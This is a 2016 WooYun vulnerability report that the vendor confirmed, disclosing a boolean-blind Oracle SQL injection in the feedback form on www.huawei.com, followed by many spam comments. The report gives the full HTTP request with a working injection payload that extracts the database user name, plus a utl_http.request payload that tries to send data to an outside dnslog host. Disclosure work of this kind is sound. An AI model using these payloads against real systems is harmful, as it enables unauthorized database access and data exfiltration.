www.huawei.com的一处Oracle注射

编号169562
Urlhttp://www.wooyun.org/bug.php?action=view&id=169562
漏洞状态厂商已经确认
漏洞标题www.huawei.com的一处Oracle注射
漏洞类型SQL注射漏洞
厂商华为技术有限公司
白帽子lijiejie
提交日期2016-01-13 11:26:00
公开日期2016-02-27 11:49:00
修复时间(not set)
确认时间2016-01-15 00:00:00
Confirm Spend2
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank9
漏洞简介
www.huawei.com的一处Oracle注射
漏洞细节

注射点:

POST /en/FeedBack HTTP/1.1
Host: www.huawei.com
Proxy-Connection: keep-alive
Content-Length: 162
Accept: */*
Origin: http://www.huawei.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.huawei.com/en/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: ASP.NET_SessionId=hupzqkr5o122wrlvuiy3qkmo; SC_ANALYTICS_GLOBAL_COOKIE=4b50e7b82e9041ffb780b270e401e1d9; SC_ANALYTICS_SESSION_COOKIE=AF78D9A9A3BF4E04B76D2DDAE215CC63|1|hupzqkr5o122wrlvuiy3qkmo; tma=92496004.78018484.1452490478559.1452490478559.1452490478559.1; tmd=1.92496004.78018484.1452490478559.; bfdid=b0605254007bf9520001766f0003017956933e84; ttc=1452737528403; s_ppv=100; cbg1#lang=en; _ga=GA1.2.1081421593.1452490472; s_depth=2; s_cc=true; s_sq=huawei-corporate-prd%252Chuawei-global-prd%3D%2526pid%253Dwww.huawei.com%25252Fen%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.huawei.com%25252Fen%25252F%252523%2526ot%253DA; s_fid=4BA49EB0CEEE9013-296CA0231EB6D47F; s_visit=1
gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&[email protected]' or 1=1 and substr(user,1,9)='WWWEXTEND§1§'--%20&gongsi=admin&tel=111&liuyan=thank+you


每一个参数都可以注入。 Oracle bool blind.

POC

先试试最基本的,逐字符猜解,得到user:

user:   WWWEXTEND


试过utl_inaddr.get_host_address将数据打回cloudeye,但是失败了。
也试了下utl_http.request,打不出来。

gryw=%7B9CB31273-36CF-41C7-B431-0C0FC7F3C11D%7D&userid=admin&[email protected]' or 1=1 and length((select utl_http.request('http://xxxxxxx.dnslog.info/1.txt') from dual))=1--%20&gongsi=admin&tel=111&liuyan=thank+you


可能Oracle DB Server不能上网,在内网中,隔离了。

修复方案

参数过滤

状态信息 2016-01-13: 细节已通知厂商并且等待厂商处理中
2016-01-15: 厂商已经确认,细节仅向厂商公开
2016-01-25: 细节向核心白帽子及相关领域专家公开
2016-02-04: 细节向普通白帽子公开
2016-02-14: 细节向实习白帽子公开
2016-02-27: 细节向公众公开
厂商回复感谢lijiejie对华为公司安全的关注,我们已经相关部门整改该漏洞。
回应信息危害等级:中漏洞Rank:9 确认时间:2016-01-15 16:49
Showing 1-42 of 42 items.
评论内容评论人点赞数评论时间

@屠龙宝刀点击就送 楼上超神了

Fire ant02016-03-03 07:24:00

你们这是要闹哪样???

屠龙宝刀点击就送02016-03-02 19:32:00

屠龙宝刀,点击就送

me1ody02016-03-01 14:55:00

屠龙宝刀,点击就送

vaf02016-01-17 19:40:00

屠龙宝刀,点击就送

Jumbo02016-01-14 09:26:00

屠龙宝刀,点击就送

带我玩02016-01-13 22:45:00

屠龙宝刀,点击就送

boger02016-01-13 22:32:00

屠龙宝刀,点击就送

从容02016-01-13 21:23:00

网络连接错误(错误代码:102)

晓贤02016-01-13 21:03:00

屠龙宝刀,点击就送

hkcs02016-01-13 20:07:00

屠龙宝刀,点击就送

kav02016-01-13 19:47:00

我是林志玲 我在天书世界等你

Fire ant02016-01-13 19:37:00

独特属性 由你打造 单挑BOSS 怒刷装备 皇城PK 胜者为王 屠龙宝刀 点击就送 极品装备 一秒刷爆 幸运抽奖 惊喜不断 经典装备 极品属性 神秘宝箱 开箱有喜 无限刷怪 双倍经验 我不断的寻找 有你的世界在哪里

金馆长02016-01-13 19:02:00

为什么没有(附验证脚本)

大亮02016-01-13 15:31:00

屠龙宝刀,点击就送

fakeidentity02016-01-13 14:27:00

屠龙宝刀,点击就送

诚殷的小白帽02016-01-13 14:26:00

屠龙宝刀,点击就送

泪雨无魂02016-01-13 14:25:00

华为主站啊

疯狗02016-01-13 14:08:00

屠龙宝刀,点击就送

华不再扬02016-01-13 13:41:00

屠龙宝刀,点击就送

红客十年02016-01-13 13:21:00

pooi

poooooi02016-01-13 13:13:00

服了

mantis02016-01-13 13:11:00

倚天神剑,点击就送

高小厨02016-01-13 13:07:00

神器么。。

YiYang02016-01-13 13:02:00

我艹,牛逼

小红猪02016-01-13 12:59:00

屠龙宝刀是个什么梗。。

sco4x002016-01-13 12:39:00

屠龙宝刀,点击就送

Submit02016-01-13 12:27:00

点击就送李劼杰经典帅照

’‘Nome02016-01-13 12:26:00

屠龙宝刀,点击就送

随风的风02016-01-13 12:26:00

屠龙宝刀,点击就送

深度安全实验室02016-01-13 12:13:00

6666

f4ckbaidu02016-01-13 12:04:00

屠龙宝刀,点击不送

一只猿02016-01-13 11:56:00

屠龙宝刀,点击不送

bey0nd02016-01-13 11:52:00

这是个什么梗

子非海绵宝宝02016-01-13 11:41:00

前排咳瓜子

404notfound02016-01-13 11:40:00

屠龙宝刀,点击就送

路人毛02016-01-13 11:38:00

屠龙宝刀,点击就送

龍 、02016-01-13 11:36:00

屠龙宝刀,点击就送

Lar2y02016-01-13 11:34:00

姐姐霸气!

紫霞仙子02016-01-13 11:31:00

屠龙宝刀,点击就送

HackBraid02016-01-13 11:30:00

屠龙宝刀,点击就送

孤独雪狼02016-01-13 11:29:00

屠龙宝刀,点击就送

Aasron02016-01-13 11:28:00